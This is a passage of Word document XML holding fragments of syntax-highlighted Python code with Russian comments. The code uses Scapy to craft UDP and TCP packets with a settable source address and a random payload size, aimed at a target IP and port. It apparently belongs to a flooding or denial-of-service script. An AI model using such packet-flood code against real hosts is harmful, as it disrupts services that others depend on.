        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>1500</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t># Случайный размер полезной нагрузки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8D40A8" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F65A5B" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t># Создание пакета</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F50923" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> == UDP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686C4068" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = IP(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>src_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)/UDP(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>sport</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>src_port</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Raw</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"X"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>payload_size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEFB491" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>elif</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> == TCP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EEEFE6" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = IP(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>src_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)/TCP(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>sport</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>src_port</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Raw</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
